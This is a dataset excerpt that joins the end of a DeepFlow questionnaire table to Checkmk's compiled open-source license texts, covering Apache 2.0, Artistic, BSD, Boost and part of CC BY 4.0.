100-1k 1k-3k 3k-5k >5k\n6 Days Days Hrs 1Hr Mins Hrs Hrs Mins Hrs 1Hr\n7 (20,100] (0,20] >100 (0,20] 0 >100 >100 0 (20,100] (20,100]\n8 20%-50% 50%-80% 20%-50% 50%-80% 50%-80% 20%-50% >80% 50%-80% 20%-50% 0%\n9 1Hr Hrs Hrs Hrs Hrs Mins 1Hr Mins Hrs 1Hr\n10 1Hr Hrs 1Hr Mins 1Hr Mins 1Hr Mins 1Hr 1Hr\n•O denotes open-source, and S denotes self-developed.\nTable 4: Questionnaire answers for multiple-choice questions.\nQ11 Where has DeepFlow helped you the most?\n1 It helps me to check network status and response latency between two microservices, making slow request troubleshooting easier.\n2 Its non-intrusive characteristic can help detect previous blind spots in the system, such as components written in Golang or Rust.\nBut it is not very useful for Java components, since skywalking is already sufficient for us.\n3 Locating problems with network data non-intrusively.\n4 Microservice Network Fault Location.\n5 Network problem diagnosis.\n6 It complements existing observability tools by providing more detailed traces and enriching the set of metrics.\n7 It can capture the time consumption of services and middleware at the network level. Besides, a lot of work is reduced by its\nnon-intrusive characteristic.\n8 Non-intrusive, low-cost deployment.\n9 (Empty)\n10 It can help us find some problems in the system, but we haven’t found a way to locate the problem precisely.\nTable 5: Questionnaire answers for the short answer question.\n18" } ]
{ "category": "Observability and Analysis", "file_name": "License_texts.pdf", "project_name": "Checkmk", "subcategory": "Observability" }
[ { "data": "Open Source licenses included in:\n \n Checkmk Enterprise Edition\nCheckmk Managed Services Edition\n Content\n4\nApache License\n7\nArtistic License 1.0\n10\nArtistic License 2.0\n13\nZero-Clause BSD\n14\nThe 2-Clause BSD License\n15\nThe 3-Clause BSD License\n16\nBoost Software License 1.0 (BSL-1.0)\n17\nCreative Commons Attribution 4.0 International Public License\n21\nCC0 1.0 Universal\n23\nEclipse Public License 2.0\n27\nGNU General Public License Version 1\n30\nGNU General Public License Version 2\n34\nGNU General Public License Version 3\n42\nISC License\n43\nStandard License Agreement for Icons8\n46\nGNU Lesser General Public License Version 2.1\n52\nGNU Lesser General Public License Version 3\n54\nThe MIT License\n55\nThe MIT License CMU Style\n56\nMozilla Public License 2.0 (MPL-2.0)\n61\nThe Python Imaging Library (PIL) Software License\n62\nPython Software Foundation License Version 2\n63\nPython License 2.0\n66\nPython License 2.1.1\n70\nThe Unlicense\n71\nDo What The F*ck You Want To Public License\n72\nXinetd License\n73\nThe zlib/libpng License\n4\nApache License\nVersion 2.0, January 2004\nhttp://www.apache.org/licenses/\nTERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n1. Definitions.\n\"License\" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of\nthis document.\n\"Licensor\" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.\n\"Legal Entity\" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under\ncommon control with that entity. For the purposes of this definition, \"control\" means (i) the power, direct or indirect, to cause\nthe direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more\nof the outstanding shares, or (iii) beneficial ownership of such entity.\n\"You\" (or \"Your\") shall mean an individual or Legal Entity exercising permissions granted by this License.\n\"Source\" form shall mean the preferred form for making modifications, including but not limited to software source code,\ndocumentation source, and configuration files.\n\"Object\" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not\nlimited to compiled object code, generated documentation, and conversions to other media types.\n\"Work\" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated\nby a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).\n\"Derivative Works\" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and\nfor which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of\nauthorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely\nlink (or bind by name) to the interfaces of, the Work and Derivative Works thereof.\n\"Contribution\" shall mean any work of authorship, including the original version of the Work and any modifications or\nadditions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the\ncopyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of\nthis definition, \"submitted\" means any form of electronic, verbal, or written communication sent to the Licensor or its\nrepresentatives, including but not limited to communication on electronic mailing lists, source code control systems, and\nissue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the\nWork, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner\nas \"Not a Contribution.\"\n\"Contributor\" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by\nLicensor and subsequently incorporated within the Work.\n2. Grant of Copyright License.\nSubject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide,\nnon-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly\ndisplay, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.\n3. Grant of Patent License.\n5\nSubject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide,\nnon-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use,\noffer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable\nby such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s)\nwith the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a\ncross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes\ndirect or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall\nterminate as of the date such litigation is filed.\n4. Redistribution.\nYou may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without\nmodifications, and in Source or Object form, provided that You meet the following conditions:\nYou must give any other recipients of the Work or Derivative Works a copy of this License; and\nYou must cause any modified files to carry prominent notices stating that You changed the files; and\nYou must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and\nattribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative\nWorks; and\nIf the Work includes a \"NOTICE\" text file as part of its distribution, then any Derivative Works that You distribute must include\na readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to\nany part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the\nDerivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display\ngenerated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE\nfile are for informational purposes only and do not modify the License. You may add Your own attribution notices within\nDerivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such\nadditional attribution notices cannot be construed as modifying the License.\nYou may add Your own copyright statement to Your modifications and may provide additional or different license terms and\nconditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided\nYour use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.\n5. Submission of Contributions.\nUnless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the\nLicensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding\nthe above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed\nwith Licensor regarding such Contributions.\n6. Trademarks.\nThis License does not grant permission to use the trade names, trademarks, service marks, or product names of the\nLicensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the\ncontent of the NOTICE file.\n7. Disclaimer of Warranty.\nUnless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its\nContributions) on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied,\nincluding, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or\nFITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or\nredistributing the Work and assume any risks associated with Your exercise of permissions under this License.\n8. Limitation of Liability.\nIn no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by\n6\napplicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You\nfor damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result\nof this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work\nstoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has\nbeen advised of the possibility of such damages.\n9. Accepting Warranty or Additional Liability.\nWhile redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of\nsupport, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting\nsuch obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other\nContributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or\nclaims asserted against, such Contributor by reason of your accepting any such warranty or additional liability.\nEND OF TERMS AND CONDITIONS\n7\nArtistic License 1.0\nPreamble\nThe intent of this document is to state the conditions under which a\nPackage may be copied, such that the Copyright Holder maintains some\nsemblance of artistic control over the development of the package,\nwhile giving the users of the package the right to use and distribute\nthe Package in a more-or-less customary fashion, plus the right to make\nreasonable modifications.\nDefinitions:\n\"Package\" refers to the collection of files distributed by the\nCopyright Holder, and derivatives of that collection of files\ncreated through textual modification.\n\"Standard Version\" refers to such a Package if it has not been\nmodified, or has been modified in accordance with the wishes\nof the Copyright Holder as specified below.\n\"Copyright Holder\" is whoever is named in the copyright or\ncopyrights for the package.\n\"You\" is you, if you're thinking about copying or distributing\nthis Package.\n\"Reasonable copying fee\" is whatever you can justify on the\nbasis of media cost, duplication charges, time of people involved,\nand so on. (You will not be required to justify it to the\nCopyright Holder, but only to the computing community at large\nas a market that must bear the fee.)\n\"Freely Available\" means that no fee is charged for the item\nitself, though there may be fees involved in handling the item.\nIt also means that recipients of the item may redistribute it\nunder the same conditions they received it.\n1. You may make and give away verbatim copies of the source form of the\nStandard Version of this Package without restriction, provided that you\nduplicate all of the original copyright notices and associated disclaimers.\n2. You may apply bug fixes, portability fixes and other modifications\nderived from the Public Domain or from the Copyright Holder. A Package\nmodified in such a way shall still be considered the Standard Version.\n3. You may otherwise modify your copy of this Package in any way, provided\nthat you insert a prominent notice in each changed file stating how and\nwhen you changed that file, and provided that you do at least ONE of the\nfollowing:\na) place your modifications in the Public Domain or otherwise make them\nFreely Available, such as by posting said modifications to Usenet or\nan equivalent medium, or placing the modifications on a major archive\n8\nsite such as uunet.uu.net, or by allowing the Copyright Holder to include\nyour modifications in the Standard Version of the Package.\nb) use the modified Package only within your corporation or organization.\nc) rename any non-standard executables so the names do not conflict\nwith standard executables, which must also be provided, and provide\na separate manual page for each non-standard executable that clearly\ndocuments how it differs from the Standard Version.\nd) make other distribution arrangements with the Copyright Holder.\n4. You may distribute the programs of this Package in object code or\nexecutable form, provided that you do at least ONE of the following:\na) distribute a Standard Version of the executables and library files,\ntogether with instructions (in the manual page or equivalent) on where\nto get the Standard Version.\nb) accompany the distribution with the machine-readable source of\nthe Package with your modifications.\nc) give non-standard executables non-standard names, and clearly\ndocument the differences in manual pages (or equivalent), together\nwith instructions on where to get the Standard Version.\nd) make other distribution arrangements with the Copyright Holder.\n5. You may charge a reasonable copying fee for any distribution of this\nPackage. You may charge any fee you choose for support of this\nPackage. You may not charge a fee for this Package itself. However,\nyou may distribute this Package in aggregate with other (possibly\ncommercial) programs as part of a larger (possibly commercial) software\ndistribution provided that you do not advertise this Package as a\nproduct of your own. You may embed this Package's interpreter within\nan executable of yours (by linking); this shall be construed as a mere\nform of aggregation, provided that the complete Standard Version of the\ninterpreter is so embedded.\n6. The scripts and library files supplied as input to or produced as\noutput from the programs of this Package do not automatically fall\nunder the copyright of this Package, but belong to whoever generated\nthem, and may be sold commercially, and may be aggregated with this\nPackage. If such scripts or library files are aggregated with this\nPackage via the so-called \"undump\" or \"unexec\" methods of producing a\nbinary executable image, then distribution of such an image shall\nneither be construed as a distribution of this Package nor shall it\nfall under the restrictions of Paragraphs 3 and 4, provided that you do\nnot represent such an executable image as a Standard Version of this\nPackage.\n7. C subroutines (or comparably compiled subroutines in other\nlanguages) supplied by you and linked into this Package in order to\nemulate subroutines and variables of the language defined by this\nPackage shall not be considered part of this Package, but are the\nequivalent of input as in Paragraph 6, provided these subroutines do\n9\nnot change the language in any way that would cause it to fail the\nregression tests for the language.\n8. Aggregation of this Package with a commercial distribution is always\npermitted provided that the use of this Package is embedded; that is,\nwhen no overt attempt is made to make this Package's interfaces visible\nto the end user of the commercial distribution. Such use shall not be\nconstrued as a distribution of this Package.\n9. The name of the Copyright Holder may not be used to endorse or promote\nproducts derived from this software without specific prior written permission.\n10. THIS PACKAGE IS PROVIDED \"AS IS\" AND WITHOUT ANY EXPRESS OR\nIMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED\nWARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.\nThe End\n10\nArtistic License 2.0\nCopyright (c) 2000-2006, The Perl Foundation.\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\nPreamble\nThis license establishes the terms under which a given free software Package may be copied, modified, distributed, and/or\nredistributed. The intent is that the Copyright Holder maintains some artistic control over the development of that Package\nwhile still keeping the Package available as open source and free software.\nYou are always permitted to make arrangements wholly outside of this license directly with the Copyright Holder of a given\nPackage. If the terms of this license do not permit the full use that you propose to make of the Package, you should contact\nthe Copyright Holder and seek a different licensing arrangement.\nDefinitions\n\"Copyright Holder\" means the individual(s) or organization(s) named in the copyright notice for the entire Package.\n\"Contributor\" means any party that has contributed code or other material to the Package, in accordance with the Copyright\nHolder's procedures.\n\"You\" and \"your\" means any person who would like to copy, distribute, or modify the Package.\n\"Package\" means the collection of files distributed by the Copyright Holder, and derivatives of that collection and/or of those\nfiles. A given Package may consist of either the Standard Version, or a Modified Version.\n\"Distribute\" means providing a copy of the Package or making it accessible to anyone else, or in the case of a company or\norganization, to others outside of your company or organization.\n\"Distributor Fee\" means any fee that you charge for Distributing this Package or providing support for this Package to\nanother party. It does not mean licensing fees.\n\"Standard Version\" refers to the Package if it has not been modified, or has been modified only in ways explicitly requested\nby the Copyright Holder.\n\"Modified Version\" means the Package, if it has been changed, and such changes were not explicitly requested by the\nCopyright Holder.\n\"Original License\" means this Artistic License as Distributed with the Standard Version of the Package, in its current version\nor as it may be modified by The Perl Foundation in the future.\n\"Source\" form means the source code, documentation source, and configuration files for the Package.\n\"Compiled\" form means the compiled bytecode, object code, binary, or any other form resulting from mechanical\ntransformation or translation of the Source form.\nPermission for Use and Modification Without Distribution\n(1) You are permitted to use the Standard Version and create and use Modified Versions for any purpose without restriction,\nprovided that you do not Distribute the Modified Version.\nPermissions for Redistribution of the Standard Version\n(2) You may Distribute verbatim copies of the Source form of the Standard Version of this Package in any medium without\nrestriction, either gratis or for a Distributor Fee, provided that you duplicate all of the original copyright notices and\nassociated disclaimers. At your discretion, such verbatim copies may or may not include a Compiled form of the Package.\n11\n(3) You may apply any bug fixes, portability changes, and other modifications made available from the Copyright Holder. The\nresulting Package will still be considered the Standard Version, and as such will be subject to the Original License.\nDistribution of Modified Versions of the Package as Source\n(4) You may Distribute your Modified Version as Source (either gratis or for a Distributor Fee, and with or without a Compiled\nform of the Modified Version) provided that you clearly document how it differs from the Standard Version, including, but not\nlimited to, documenting any non-standard features, executables, or modules, and provided that you do at least ONE of the\nfollowing:\n(a) make the Modified Version available to the Copyright Holder of the Standard Version, under the Original License, so that\nthe Copyright Holder may include your modifications in the Standard Version.\n(b) ensure that installation of your Modified Version does not prevent the user installing or running the Standard Version. In\naddition, the Modified Version must bear a name that is different from the name of the Standard Version.\n(c) allow anyone who receives a copy of the Modified Version to make the Source form of the Modified Version available to\nothers under\n(i) the Original License or\n(ii) a license that permits the licensee to freely copy, modify and redistribute the Modified Version using the same licensing\nterms that apply to the copy that the licensee received, and requires that the Source form of the Modified Version, and of any\nworks derived from it, be made freely available in that license fees are prohibited but Distributor Fees are allowed.\nDistribution of Compiled Forms of the Standard Version or Modified Versions without the Source\n(5) You may Distribute Compiled forms of the Standard Version without the Source, provided that you include complete\ninstructions on how to get the Source of the Standard Version. Such instructions must be valid at the time of your\ndistribution. If these instructions, at any time while you are carrying out such distribution, become invalid, you must provide\nnew instructions on demand or cease further distribution. If you provide valid instructions or cease distribution within thirty\ndays after you become aware that the instructions are invalid, then you do not forfeit any of your rights under this license.\n(6) You may Distribute a Modified Version in Compiled form without the Source, provided that you comply with Section 4 with\nrespect to the Source of the Modified Version.\nAggregating or Linking the Package\n(7) You may aggregate the Package (either the Standard Version or Modified Version) with other packages and Distribute\nthe resulting aggregation provided that you do not charge a licensing fee for the Package. Distributor Fees are permitted,\nand licensing fees for other components in the aggregation are permitted. The terms of this license apply to the use and\nDistribution of the Standard or Modified Versions as included in the aggregation.\n(8) You are permitted to link Modified and Standard Versions with other works, to embed the Package in a larger work of\nyour own, or to build stand-alone binary or bytecode versions of applications that include the Package, and Distribute the\nresult without restriction, provided the result does not expose a direct interface to the Package.\nItems That are Not Considered Part of a Modified Version\n(9) Works (including, but not limited to, modules and scripts) that merely extend or make use of the Package, do not, by\nthemselves, cause the Package to be a Modified Version. In addition, such works are not considered parts of the Package\nitself, and are not subject to the terms of this license.\nGeneral Provisions\n(10) Any use, modification, and distribution of the Standard or Modified Versions is governed by this Artistic License. By\nusing, modifying or distributing the Package, you accept this license. Do not use, modify, or distribute the Package, if you do\nnot accept this license.\n(11) If your Modified Version has been derived from a Modified Version made by someone other than you, you are\nnevertheless required to ensure that your Modified Version complies with the requirements of this license.\n(12) This license does not grant you the right to use any trademark, service mark, tradename, or logo of the Copyright\nHolder.\n12\n(13) This license includes the non-exclusive, worldwide, free-of-charge patent license to make, have made, use, offer to sell,\nsell, import and otherwise transfer the Package with respect to any patent claims licensable by the Copyright Holder that are\nnecessarily infringed by the Package. If you institute patent litigation (including a cross-claim or counterclaim) against any\nparty alleging that the Package constitutes direct or contributory patent infringement, then this Artistic License to you shall\nterminate on the date that such litigation is filed.\n(14) Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER AND CONTRIBUTORS \"AS\nIS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE IMPLIED WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED\nBY YOUR LOCAL LAW. UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE\nUSE OF THE PACKAGE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n13\nZero-Clause BSD\nPermission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted.\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS\nSOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL\nTHE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY\nDAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF\nCONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE\nOR PERFORMANCE OF THIS SOFTWARE.\n14\nThe 2-Clause BSD License\nCopyright\nRedistribution and use in source and binary forms, with or without modification, are permitted provided that the following\nconditions are met:\n1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following\ndisclaimer in the documentation and/or other materials provided with the distribution.\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER\nOR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\nOTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n15\nThe 3-Clause BSD License\nCopyright\nRedistribution and use in source and binary forms, with or without modification, are permitted provided that the following\nconditions are met:\n1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following\ndisclaimer in the documentation and/or other materials provided with the distribution.\n3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products\nderived from this software without specific prior written permission.\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER\nOR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\nOTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n16\nBoost Software License 1.0 (BSL-1.0)\nPermission is hereby granted, free of charge, to any person or organization obtaining a copy of the software and\naccompanying documentation covered by this license (the \"Software\") to use, reproduce, display, distribute, execute, and\ntransmit the Software, and to prepare derivative works of the Software, and to permit third-parties to whom the Software is\nfurnished to do so, all subject to the following:\nThe copyright notices in the Software and this entire statement, including the above license grant, this restriction and the\nfollowing disclaimer, must be included in all copies of the Software, in whole or in part, and all derivative works of the\nSoftware, unless such copies or derivative works are solely in the form of machine-executable object code generated by a\nsource language processor.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\nBUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE\nAND NON-INFRINGEMENT. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR ANYONE DISTRIBUTING THE\nSOFTWARE BE LIABLE FOR ANY DAMAGES OR OTHER LIABILITY, WHETHER IN CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n17\nCreative Commons Attribution 4.0 International Public\nLicense\nCreative Commons Corporation (\"Creative Commons\") is not a law firm and does not provide legal services or legal advice.\nDistribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons\nmakes its licenses and related information available on an \"as-is\" basis. Creative Commons gives no warranties regarding its\nlicenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all\nliability for damages resulting from their use to the fullest extent possible.\nUsing Creative Commons Public Licenses\nCreative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may\nuse to share original works of authorship and other material subject to copyright and certain other rights specified in the\npublic license below. The following considerations are for informational purposes only, are not exhaustive, and do not form\npart of our licenses.\nConsiderations for licensors: Our public licenses are intended for use by those authorized to give the public permission to\nuse material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors\nshould read and understand the terms and conditions of the license they choose before applying it. Licensors should also\nsecure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors\nshould clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under\nan exception or limitation to copyright. More considerations for licensors:\nwiki.creativecommons.org/Considerations_for_licensors\nConsiderations for the public: By using one of our public licenses, a licensor grants the public permission to use the licensed\nmaterial under specified terms and conditions. If the licensor's permission is not necessary for any reason–for example,\nbecause of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses\ngrant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed\nmaterial may still be restricted for other reasons, including because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked or described. Although not required by our\nlicenses, you are encouraged to respect those requests where reasonable. More considerations for the public:\nwiki.creativecommons.org/Considerations_for_licensees\nCreative Commons Attribution 4.0 International Public License\nBy exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this\nCreative Commons Attribution 4.0 International Public License (\"Public License\"). To the extent this Public License may be\ninterpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and\nconditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the\nLicensed Material available under these terms and conditions.\nSection 1 – Definitions.\na. Adapted Material means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed\nMaterial and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner\nrequiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where\nthe Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the\nLicensed Material is synched in timed relation with a moving image.\nb. Adapter's License means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted\nMaterial in accordance with the terms and conditions of this Public License.\nc. Copyright and Similar Rights means copyright and/or similar rights closely related to copyright including, without limitation,\nperformance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or\n18\ncategorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar\nRights.\nd. Effective Technological Measures means those measures that, in the absence of proper authority, may not be\ncircumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\ne. Exceptions and Limitations means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar\nRights that applies to Your use of the Licensed Material.\nf. Licensed Material means the artistic or literary work, database, or other material to which the Licensor applied this Public\nLicense.\ng. Licensed Rights means the rights granted to You subject to the terms and conditions of this Public License, which are\nlimited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority\nto license.\nh. Licensor means the individual(s) or entity(ies) granting rights under this Public License.\ni. Share means to provide material to the public by any means or process that requires permission under the Licensed\nRights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation,\nand to make material available to the public including in ways that members of the public may access the material from a\nplace and at a time individually chosen by them.\nj. Sui Generis Database Rights means rights other than copyright resulting from Directive 96/9/EC of the European\nParliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as\nwell as other essentially equivalent rights anywhere in the world.\nk. You means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding\nmeaning.\nSection 2 – Scope.\na. License grant.\n1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free,\nnon-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to:\nA. reproduce and Share the Licensed Material, in whole or in part; and\nB. produce, reproduce, and Share Adapted Material.\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public\nLicense does not apply, and You do not need to comply with its terms and conditions.\n3. Term. The term of this Public License is specified in Section 6(a).\n4. Media and formats; technical modifications allowed. The Licensor authorizes You to exercise the Licensed Rights in all\nmedia and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The\nLicensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications\nnecessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective\nTechnological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4)\nnever produces Adapted Material.\n5. Downstream recipients.\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed Material automatically receives an offer from\nthe Licensor to exercise the Licensed Rights under the terms and conditions of this Public License.\nB. No downstream restrictions. You may not offer or impose any additional or different terms or conditions on, or apply any\nEffective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any\nrecipient of the Licensed Material.\n6. No endorsement. Nothing in this Public License constitutes or may be construed as permission to assert or imply that You\nare, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the\nLicensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i).\nb. Other rights.\n1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or\nother similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such\nrights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise.\n2. Patent and trademark rights are not licensed under this Public License.\n3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights,\nwhether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In\nall other cases the Licensor expressly reserves any right to collect such royalties.\n19\nSection 3 – License Conditions.\nYour exercise of the Licensed Rights is expressly made subject to the following conditions.\na. Attribution.\n1. If You Share the Licensed Material (including in modified form), You must:\nA. retain the following if it is supplied by the Licensor with the Licensed Material:\ni. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable\nmanner requested by the Licensor (including by pseudonym if designated);\nii. a 